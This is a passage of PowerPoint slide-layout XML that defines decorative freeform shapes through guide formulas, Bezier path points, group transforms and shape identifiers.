                  <a:gd name="T93" fmla="*/ 527 h 564"/>
                  <a:gd name="T94" fmla="*/ 332 w 452"/>
                  <a:gd name="T95" fmla="*/ 552 h 564"/>
                  <a:gd name="T96" fmla="*/ 246 w 452"/>
                  <a:gd name="T97" fmla="*/ 552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564">
                    <a:moveTo>
                      <a:pt x="452" y="402"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="372"/>
                      <a:pt x="373" y="323"/>
                      <a:pt x="367" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="366" y="209"/>
                      <a:pt x="364" y="156"/>
                      <a:pt x="360" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="62"/>
                      <a:pt x="313" y="0"/>
                      <a:pt x="226" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="0"/>
                      <a:pt x="104" y="62"/>
                      <a:pt x="92" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="156"/>
                      <a:pt x="86" y="209"/>
                      <a:pt x="85" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="323"/>
                      <a:pt x="57" y="372"/>
                      <a:pt x="0" y="402"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="42" y="426"/>
                      <a:pt x="83" y="406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="465"/>
                      <a:pt x="83" y="558"/>
                      <a:pt x="83" y="558"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="564"/>
                      <a:pt x="83" y="564"/>
                      <a:pt x="83" y="564"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="369" y="564"/>
                      <a:pt x="369" y="564"/>
                      <a:pt x="369" y="564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30"/>
                      <a:pt x="369" y="456"/>
                      <a:pt x="369" y="406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="426"/>
                      <a:pt x="452" y="402"/>
                      <a:pt x="452" y="402"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="265" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="281" y="69"/>
                      <a:pt x="293" y="82"/>
                      <a:pt x="293" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="113"/>
                      <a:pt x="281" y="126"/>
                      <a:pt x="265" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="126"/>
                      <a:pt x="237" y="113"/>
                      <a:pt x="237" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="82"/>
                      <a:pt x="249" y="69"/>
                      <a:pt x="265" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="226" y="135"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="181"/>
                      <a:pt x="293" y="181"/>
                      <a:pt x="293" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="228"/>
                      <a:pt x="226" y="228"/>
                      <a:pt x="226" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="181"/>
                      <a:pt x="159" y="181"/>
                      <a:pt x="159" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="137"/>
                      <a:pt x="224" y="137"/>
                      <a:pt x="224" y="137"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="226" y="135"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="187" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="69"/>
                      <a:pt x="216" y="82"/>
                      <a:pt x="216" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="113"/>
                      <a:pt x="203" y="126"/>
                      <a:pt x="187" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="126"/>
                      <a:pt x="159" y="113"/>
                      <a:pt x="159" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="82"/>
                      <a:pt x="171" y="69"/>
                      <a:pt x="187" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="116" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="543"/>
                      <a:pt x="129" y="527"/>
                      <a:pt x="159" y="527"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="527"/>
                      <a:pt x="198" y="543"/>
                      <a:pt x="202" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="552"/>
                      <a:pt x="128" y="552"/>
                      <a:pt x="116" y="552"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="214" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="540"/>
                      <a:pt x="199" y="515"/>
                      <a:pt x="159" y="515"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="515"/>
                      <a:pt x="138" y="517"/>
                      <a:pt x="131" y="520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="478"/>
                      <a:pt x="132" y="411"/>
                      <a:pt x="133" y="381"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="328"/>
                      <a:pt x="155" y="267"/>
                      <a:pt x="229" y="267"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="267"/>
                      <a:pt x="318" y="328"/>
                      <a:pt x="321" y="386"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="322" y="410"/>
                      <a:pt x="322" y="480"/>
                      <a:pt x="322" y="523"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="518"/>
                      <a:pt x="303" y="515"/>
                      <a:pt x="289" y="515"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="515"/>
                      <a:pt x="237" y="540"/>
                      <a:pt x="233" y="552"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="214" y="552"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="246" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="543"/>
                      <a:pt x="259" y="527"/>
                      <a:pt x="289" y="527"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="318" y="527"/>
                      <a:pt x="328" y="543"/>
                      <a:pt x="332" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="552"/>
                      <a:pt x="258" y="552"/>
                      <a:pt x="246" y="5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029D62AF-B2EF-4327-82D3-71416C4C482F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="19675956">
              <a:off x="7990249" y="2420029"/>
              <a:ext cx="374558" cy="1069622"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="144" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9B7753-202C-4E54-9B68-B4E9925CC0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5" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95326893-F5A8-412F-9C30-47AE4332C00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6" name="任意多边形 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5E1DF0-FEAB-44A1-A536-1A6060643D59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5" name="组合 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09236720-D26F-42EB-9242-4ECA45ED3921}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="19599641">
              <a:off x="8622723" y="3034862"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="142" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E21525F3-10AD-4B3E-9D53-0F16E221FEC8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078074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3" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF2EE96-D359-4BB8-A522-C43F8CA42D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754E3E49-73C1-4C7B-9796-B05CABAAB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136281" flipH="1" flipV="1">
              <a:off x="4057595" y="4214936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7F6B6CF5-CE00-4960-B66D-8F3EB2FD09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7348708" y="5932775"/>
              <a:ext cx="736600" cy="738188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53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56B1CAF-0950-4C34-88E5-568EFEA5EE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348066" flipH="1" flipV="1">
              <a:off x="652486" y="1643390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55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7027047F-6900-4A8E-83B9-72FB45F661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9523279" y="6283862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63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483E1C4C-E069-4867-8BB7-6AFF12B12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1492555" y="784424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70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F283B0C-1F7D-49A5-A40A-11A5A38768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321078" flipH="1" flipV="1">
              <a:off x="5721577" y="6018517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74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE2AB650-9E8D-47AF-A1DE-DB6B6C1600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402556" flipH="1" flipV="1">
              <a:off x="2052362" y="5640706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94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A77953C-4C32-4795-8AFE-833B50CD65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10433292" y="6078963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114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6959B724-3EE0-4468-A9ED-7D6D40B55B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669559" flipH="1" flipV="1">
              <a:off x="4917663" y="6097573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124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D29C7832-ED0A-44E5-ACDE-4CC1E2930D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36245" flipH="1" flipV="1">
              <a:off x="4535125" y="5906200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469D85C9-2906-42E8-AF5F-21F29E9BB2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="20193509" flipH="1" flipV="1">
              <a:off x="3003208" y="5577558"/>
              <a:ext cx="314410" cy="448364"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 190"/>
                <a:gd name="T1" fmla="*/ 101 h 272"/>
                <a:gd name="T2" fmla="*/ 178 w 190"/>
                <a:gd name="T3" fmla="*/ 82 h 272"/>
                <a:gd name="T4" fmla="*/ 96 w 190"/>
                <a:gd name="T5" fmla="*/ 0 h 272"/>
                <a:gd name="T6" fmla="*/ 14 w 190"/>
                <a:gd name="T7" fmla="*/ 82 h 272"/>
                <a:gd name="T8" fmla="*/ 17 w 190"/>
                <a:gd name="T9" fmla="*/ 103 h 272"/>
                <a:gd name="T10" fmla="*/ 0 w 190"/>
                <a:gd name="T11" fmla="*/ 272 h 272"/>
                <a:gd name="T12" fmla="*/ 190 w 190"/>
                <a:gd name="T13" fmla="*/ 272 h 272"/>
                <a:gd name="T14" fmla="*/ 176 w 190"/>
                <a:gd name="T15" fmla="*/ 10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272">
                  <a:moveTo>
                    <a:pt x="176" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="95"/>
                    <a:pt x="178" y="89"/>
                    <a:pt x="178" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="37"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="0"/>
                    <a:pt x="14" y="37"/>
                    <a:pt x="14" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="15" y="96"/>
                    <a:pt x="17" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="135"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="0" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="227"/>
                    <a:pt x="174" y="133"/>
                    <a:pt x="176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76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A362954-F616-49BD-A8CC-8CF7F51DEF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187272" flipH="1" flipV="1">
              <a:off x="482235" y="6053258"/>
              <a:ext cx="696926" cy="867919"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 452 w 452"/>
                <a:gd name="T1" fmla="*/ 402 h 564"/>
                <a:gd name="T2" fmla="*/ 367 w 452"/>
                <a:gd name="T3" fmla="*/ 269 h 564"/>
                <a:gd name="T4" fmla="*/ 360 w 452"/>
                <a:gd name="T5" fmla="*/ 135 h 564"/>
                <a:gd name="T6" fmla="*/ 226 w 452"/>
                <a:gd name="T7" fmla="*/ 0 h 564"/>
                <a:gd name="T8" fmla="*/ 92 w 452"/>
                <a:gd name="T9" fmla="*/ 135 h 564"/>
                <a:gd name="T10" fmla="*/ 85 w 452"/>
                <a:gd name="T11" fmla="*/ 269 h 564"/>
                <a:gd name="T12" fmla="*/ 0 w 452"/>
                <a:gd name="T13" fmla="*/ 402 h 564"/>
                <a:gd name="T14" fmla="*/ 83 w 452"/>
                <a:gd name="T15" fmla="*/ 406 h 564"/>
                <a:gd name="T16" fmla="*/ 83 w 452"/>
                <a:gd name="T17" fmla="*/ 558 h 564"/>
                <a:gd name="T18" fmla="*/ 83 w 452"/>
                <a:gd name="T19" fmla="*/ 564 h 564"/>
                <a:gd name="T20" fmla="*/ 369 w 452"/>
                <a:gd name="T21" fmla="*/ 564 h 564"/>
                <a:gd name="T22" fmla="*/ 369 w 452"/>
                <a:gd name="T23" fmla="*/ 552 h 564"/>
                <a:gd name="T24" fmla="*/ 369 w 452"/>
                <a:gd name="T25" fmla="*/ 552 h 564"/>
                <a:gd name="T26" fmla="*/ 369 w 452"/>
                <a:gd name="T27" fmla="*/ 406 h 564"/>
                <a:gd name="T28" fmla="*/ 452 w 452"/>
                <a:gd name="T29" fmla="*/ 402 h 564"/>
                <a:gd name="T30" fmla="*/ 265 w 452"/>
                <a:gd name="T31" fmla="*/ 69 h 564"/>
                <a:gd name="T32" fmla="*/ 293 w 452"/>
                <a:gd name="T33" fmla="*/ 98 h 564"/>
                <a:gd name="T34" fmla="*/ 265 w 452"/>
                <a:gd name="T35" fmla="*/ 126 h 564"/>
                <a:gd name="T36" fmla="*/ 237 w 452"/>
                <a:gd name="T37" fmla="*/ 98 h 564"/>
                <a:gd name="T38" fmla="*/ 265 w 452"/>
                <a:gd name="T39" fmla="*/ 69 h 564"/>
                <a:gd name="T40" fmla="*/ 226 w 452"/>
                <a:gd name="T41" fmla="*/ 135 h 564"/>
                <a:gd name="T42" fmla="*/ 293 w 452"/>
                <a:gd name="T43" fmla="*/ 181 h 564"/>
                <a:gd name="T44" fmla="*/ 226 w 452"/>
                <a:gd name="T45" fmla="*/ 228 h 564"/>
                <a:gd name="T46" fmla="*/ 159 w 452"/>
                <a:gd name="T47" fmla="*/ 181 h 564"/>
                <a:gd name="T48" fmla="*/ 224 w 452"/>
                <a:gd name="T49" fmla="*/ 137 h 564"/>
                <a:gd name="T50" fmla="*/ 226 w 452"/>
                <a:gd name="T51" fmla="*/ 135 h 564"/>
                <a:gd name="T52" fmla="*/ 187 w 452"/>
                <a:gd name="T53" fmla="*/ 69 h 564"/>
                <a:gd name="T54" fmla="*/ 216 w 452"/>
                <a:gd name="T55" fmla="*/ 98 h 564"/>
                <a:gd name="T56" fmla="*/ 187 w 452"/>
                <a:gd name="T57" fmla="*/ 126 h 564"/>
                <a:gd name="T58" fmla="*/ 159 w 452"/>
                <a:gd name="T59" fmla="*/ 98 h 564"/>
                <a:gd name="T60" fmla="*/ 187 w 452"/>
                <a:gd name="T61" fmla="*/ 69 h 564"/>
                <a:gd name="T62" fmla="*/ 116 w 452"/>
                <a:gd name="T63" fmla="*/ 552 h 564"/>
                <a:gd name="T64" fmla="*/ 159 w 452"/>
                <a:gd name="T65" fmla="*/ 527 h 564"/>
                <a:gd name="T66" fmla="*/ 202 w 452"/>
                <a:gd name="T67" fmla="*/ 552 h 564"/>
                <a:gd name="T68" fmla="*/ 116 w 452"/>
                <a:gd name="T69" fmla="*/ 552 h 564"/>
                <a:gd name="T70" fmla="*/ 214 w 452"/>
                <a:gd name="T71" fmla="*/ 552 h 564"/>
                <a:gd name="T72" fmla="*/ 159 w 452"/>
                <a:gd name="T73" fmla="*/ 515 h 564"/>
                <a:gd name="T74" fmla="*/ 131 w 452"/>
                <a:gd name="T75" fmla="*/ 520 h 564"/>
                <a:gd name="T76" fmla="*/ 133 w 452"/>
                <a:gd name="T77" fmla="*/ 381 h 564"/>
                <a:gd name="T78" fmla="*/ 229 w 452"/>
                <a:gd name="T79" fmla="*/ 267 h 564"/>
                <a:gd name="T80" fmla="*/ 321 w 452"/>
                <a:gd name="T81" fmla="*/ 386 h 564"/>
                <a:gd name="T82" fmla="*/ 322 w 452"/>
                <a:gd name="T83" fmla="*/ 523 h 564"/>
                <a:gd name="T84" fmla="*/ 289 w 452"/>
                <a:gd name="T85" fmla="*/ 515 h 564"/>
                <a:gd name="T86" fmla="*/ 233 w 452"/>
                <a:gd name="T87" fmla="*/ 552 h 564"/>
                <a:gd name="T88" fmla="*/ 214 w 452"/>
                <a:gd name="T89" fmla="*/ 552 h 564"/>
                <a:gd name="T90" fmla="*/ 246 w 452"/>
                <a:gd name="T91" fmla="*/ 552 h 564"/>
                <a:gd name="T92" fmla="*/ 289 w 452"/>
                <a:gd name="T93" fmla="*/ 527 h 564"/>
                <a:gd name="T94" fmla="*/ 332 w 452"/>
                <a:gd name="T95" fmla="*/ 552 h 564"/>
                <a:gd name="T96" fmla="*/ 246 w 452"/>
                <a:gd name="T97" fmla="*/ 55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2" h="564">
                  <a:moveTo>
                    <a:pt x="452" y="402"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="372"/>
                    <a:pt x="373" y="323"/>
                    <a:pt x="367" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="209"/>
                    <a:pt x="364" y="156"/>
                    <a:pt x="360" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="62"/>
                    <a:pt x="313" y="0"/>
                    <a:pt x="226" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="0"/>
                    <a:pt x="104" y="62"/>
                    <a:pt x="92" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="156"/>
                    <a:pt x="86" y="209"/>
                    <a:pt x="85" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="323"/>
                    <a:pt x="57" y="372"/>
                    <a:pt x="0" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="402"/>
                    <a:pt x="42" y="426"/>
                    <a:pt x="83" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="465"/>
                    <a:pt x="83" y="558"/>
                    <a:pt x="83" y="558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="564"/>
                    <a:pt x="83" y="564"/>
                    <a:pt x="83" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="564"/>
                    <a:pt x="369" y="564"/>
                    <a:pt x="369" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="530"/>
                    <a:pt x="369" y="456"/>
                    <a:pt x="369" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="426"/>
                    <a:pt x="452" y="402"/>
                    <a:pt x="452" y="402"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="69"/>
                    <a:pt x="293" y="82"/>
                    <a:pt x="293" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="113"/>
                    <a:pt x="281" y="126"/>
                    <a:pt x="265" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="126"/>
                    <a:pt x="237" y="113"/>
                    <a:pt x="237" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="82"/>
                    <a:pt x="249" y="69"/>
                    <a:pt x="265" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="181"/>
                    <a:pt x="293" y="181"/>
                    <a:pt x="293" y="181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159" y="181"/>
                    <a:pt x="159" y="181"/>
                    <a:pt x="159" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="137"/>
                    <a:pt x="224" y="137"/>
                    <a:pt x="224" y="137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226" y="135"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="187" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="69"/>
                    <a:pt x="216" y="82"/>
                    <a:pt x="216" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="113"/>
                    <a:pt x="203" y="126"/>
                    <a:pt x="187" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="126"/>
                    <a:pt x="159" y="113"/>
                    <a:pt x="159" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="82"/>
                    <a:pt x="171" y="69"/>
                    <a:pt x="187" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="543"/>
                    <a:pt x="129" y="527"/>
                    <a:pt x="159" y="527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="527"/>
                    <a:pt x="198" y="543"/>
                    <a:pt x="202" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="552"/>
                    <a:pt x="128" y="552"/>
                    <a:pt x="116" y="552"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="214" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="540"/>
                    <a:pt x="199" y="515"/>
                    <a:pt x="159" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="515"/>
                    <a:pt x="138" y="517"/>
                    <a:pt x="131" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="478"/>
                    <a:pt x="132" y="411"/>
                    <a:pt x="133" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="328"/>
                    <a:pt x="155" y="267"/>
                    <a:pt x="229" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="267"/>
                    <a:pt x="318" y="328"/>
                    <a:pt x="321" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="410"/>
                    <a:pt x="322" y="480"/>
                    <a:pt x="322" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="518"/>
                    <a:pt x="303" y="515"/>
                    <a:pt x="289" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="515"/>
                    <a:pt x="237" y="540"/>
                    <a:pt x="233" y="552"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214" y="552"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="246" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="543"/>
                    <a:pt x="259" y="527"/>
                    <a:pt x="289" y="527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="527"/>
                    <a:pt x="328" y="543"/>
                    <a:pt x="332" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="552"/>
                    <a:pt x="258" y="552"/>
                    <a:pt x="246" y="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94949CD6-25D2-4186-99FE-47AA884128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932726" flipH="1" flipV="1">
              <a:off x="10489459" y="4413740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32122647-3AD9-4CC2-B50A-F8353DE45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5145695" flipH="1" flipV="1">
              <a:off x="9171224" y="3715572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DCD0EE64-0D6E-4360-9CF2-8582809076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058153" flipH="1" flipV="1">
              <a:off x="10444224" y="2482855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D51A52E1-8AE9-4D71-8FE6-87540DA295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6885" flipH="1" flipV="1">
              <a:off x="1667071" y="-59064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12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D7F083-24A0-4A46-902F-FA0BA1F19B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786341" flipH="1" flipV="1">
              <a:off x="10209714" y="3389815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14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551B8719-D298-4D2C-BCD7-4163B9B2BD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-185" y="61549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791759C5-E019-4E94-9477-41BB352751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6343221" y="1893150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28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A668D8-62FB-4591-885F-D1D3A1012B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288" flipH="1" flipV="1">
              <a:off x="9566286" y="2327353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6" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2A058-2852-4335-9E4B-E8F8DF5F863F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
